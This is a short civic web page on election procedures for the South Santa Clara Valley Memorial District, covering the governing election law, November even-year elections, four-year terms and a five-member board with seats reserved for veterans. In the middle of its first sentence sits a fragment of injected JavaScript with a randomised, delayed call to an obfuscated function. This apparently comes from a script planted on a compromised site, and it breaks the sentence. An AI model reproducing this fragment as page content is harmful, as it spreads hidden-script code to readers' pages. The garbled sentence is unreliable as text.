Election Procedures

Elections for the South Santa Clara Valley Memorial District are governed by the provisions of the Uniform District Election Law andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and held on the first Tuesday after the first Monday in November each even-numbered year.

The term of office for elected Directors is four years. The board consists of five members who must be registered electors residing within the district. A majority of the seats on the board are designated for veterans.
